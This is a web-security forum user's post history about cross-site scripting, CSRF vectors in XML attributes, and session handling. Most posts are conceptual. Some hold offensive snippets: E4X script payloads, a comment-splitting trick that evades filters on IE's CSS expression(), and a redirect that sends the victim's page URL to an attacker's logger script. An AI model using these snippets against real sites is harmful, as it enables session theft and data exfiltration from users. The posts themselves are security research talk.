Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables, and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.

5 years ago
riahmatic
Okay, I have something. The client-side code would still have access to local intranet resources, whereas the server-side code wouldn't, so the reach actually isn't the same. Even though they are both stateless, the client-side code can load anything off the intranet unless it's locked down. Any unsecured files and forms could be requested. So not sending cookies doesn't seem to be enough protectio
Forum: CSRF and Session Info
6 years ago
riahmatic
Let's say browsers didn't send any cookies when embedding content (img, script, css, video) across domains and allowed cross-domain requests on anything. So your client-side code would have the same reach as server-side code and the same restrictions, having no session cookies. What are the flaws with this model? Any new risks? I couldn't come up with anything good.
Forum: CSRF and Session Info
6 years ago
riahmatic
Yeah, this is getting interesting.
Forum: XSS Info
6 years ago
riahmatic
Double post, my b.
Forum: XSS Info
6 years ago
riahmatic
Wow, 1..* is valid syntax.
Forum: XSS Info
6 years ago
riahmatic
rdf:resource attributes, GET, returns data. Edit: It's safe to say that most clients that read arbitrary XML attributes that utilize URLs could be susceptible to CSRFs. A friend's VoIP setup that uses an XML config file to grab images comes to mind.
Forum: CSRF and Session Info
6 years ago
riahmatic
I tried everything I could think of: overloading XML and XMLList, getters, setters. Got nothing :(. Good resource: http://rephrase.net/days/07/06/e4x
Forum: XSS Info
6 years ago
riahmatic
I don't see the save button for the chat anymore :( Edit: err, nevermind. Edit: you could check parent.location and maybe modify the form randomly if it doesn't match yours. Or just break out.
Forum: CSRF and Session Info
6 years ago
riahmatic
@Ronald That would be a neat way to check if someone has an extension installed: check for an entity from its DTD.
Forum: CSRF and Session Info
6 years ago
riahmatic
Don't forget XML schemas: xsi:schemaLocation="http://www.w3schools.com/note.xsd" GET, returns xml data.
Forum: CSRF and Session Info
6 years ago
riahmatic
window.onunload will fire if the page reloads or the window closes. You could do something like this: for all in-site links/forms, onsubmit/onclick="window.localLoad=true". Then this would catch everything else (close, remote link, crash?):
window.onunload = function(){ if(!window.localLoad) /* logout logic here */; }
Forum: CSRF and Session Info
6 years ago
riahmatic
Probably a stretch, but some clients will fetch DTD URLs.. GET
Forum: CSRF and Session Info
6 years ago
riahmatic
Checking out what scope {} executes in:
function blah(){ e4x = <a>{alert(this)}</a> }
blah(); // alerts
var b = new blah(); // alerts
(In the latter case, the object it alerts is b, not the e4x var itself.)
Forum: XSS Info
6 years ago
riahmatic
a = alert
e4x = <a>{a(1)}</a>
Sadly, no Opera or Safari support either :(
Forum: XSS Info
6 years ago
riahmatic
Have the redirection script append the current page's location as a parameter to the logger, something like: document.location = 'http://me.com/logger.php?good_url='+document.location.href Then you can grab that param in your PHP. (This assumes the redirection happens from the profile page.)
Forum: XSS Info
6 years ago
riahmatic
The image contents don't become a part of the HTML source, so no, I don't think that'll work.
Forum: XSS Info
6 years ago
riahmatic
Mm, check out revision 107 of their wiki: http://developer.yahoo.net/hackday-wiki/index.cgi?action=revisions&page_name=HomePage&revision_id=107 brokenz
Forum: Full Disclosure
6 years ago
riahmatic
I think a file-sharing client written in JavaScript would be cool :D
Forum: XSS Info
6 years ago
riahmatic
I've completed it, but I'm very interested in the hack you found, .mario.
Forum: XSS Info
6 years ago
riahmatic
@noconnexion I think the backslashes in e\xp\re\s\s\i\o\n are breaking the vector in IE. Instead of backslashes you could use comments in it, like: expres/**/sion. You could place /*woohoocomment*/ between every char if you wanted and it'd still work.
Forum: XSS Info
6 years ago
riahmatic
Oh hai. I was drug here by that diminutive XSS worm contest. JavaScript was my first prog language, but that was seriously some crazy ish I witnessed there, hah. I build web apps but didn't really pay attention to security much... now it's like crack to me :/
Forum: Intro